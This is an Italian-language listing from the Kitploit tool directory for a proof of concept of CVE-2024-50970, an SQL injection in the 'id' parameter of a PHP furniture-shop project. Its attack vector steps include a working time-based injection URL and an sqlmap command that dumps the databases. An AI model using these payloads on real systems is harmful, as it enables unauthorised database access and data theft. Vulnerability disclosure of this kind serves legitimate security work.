Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-50970 — Proof-of-concept che dimostra l'iniezione SQL basata sul tempo nel progetto Itsourcecode Online Furniture Shopping Project 1.0 tramite il parametro `id` in `orderview1.php`, inclusi i passaggi di sfruttamento e i comandi SQLMap. | Kitploit
Strumenti/GitHubGitHub/akhlak2511/cve-2024-50970
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSicurezza dei Database
GitHubakhlak2511/cve-2024-50970

CVE-2024-50970

Proof-of-concept che dimostra l'iniezione SQL basata sul tempo nel progetto Itsourcecode Online Furniture Shopping Project 1.0 tramite il parametro `id` in `orderview1.php`, inclusi i passaggi di sfruttamento e i comandi SQLMap.

Vedi Repository
51 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-50970

Descrizione

Una vulnerabilità di SQL injection in orderview1.php di Itsourcecode Online Furniture Shopping Project 1.0 consente a un utente malintenzionato remoto di eseguire comandi SQL arbitrari tramite il parametro id.

Tipo di vulnerabilità

SQL Injection

Fornitore del prodotto

Itsourcecode

Base del codice prodotto affetto:

https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/ - 1.0

Componente affetto:

Itsourcecode Online Furniture Shopping v1.0 è vulnerabile a SQL injection attraverso il parametro id nella pagina orderview1.php

Vettori d'attacco:

  1. Configurare l'applicazione localmente, registrare un account e accedere con l'account appena registrato.
  • Navigare al seguente URL nel browser: http://localhost/nikos/orderview1.php?action=edit&id=1728835149
  • Iniettare il payload SQL: Modificare il parametro id nell'URL per includere un payload di SQL injection basato sul tempo. http://localhost/nikos/orderview1.php?action=edit&id=1728835149+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))DTmU)
  • Osservare la risposta dell'applicazione: La pagina dovrebbe impiegare notevolmente più tempo (10 secondi) per caricarsi se l'iniezione ha successo, confermando che il parametro id è vulnerabile a SQL injection.
  • Utilizzare ora lo strumento SQLMap per ulteriori sfruttamenti e dumping dei database usando il comando seguente: python sqlmap.py -u "http://localhost/nikos/orderview1.php?action=edit&id=1728835149" --cookie="PHPSESSID=your_cookie_here"--risk 3 --level 3 --dbs --technique=T --dump --no-cast
  • Riferimenti:

    1. https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/
    2. https://owasp.org/www-community/attacks/SQL_Injection
    Scarica lo strumento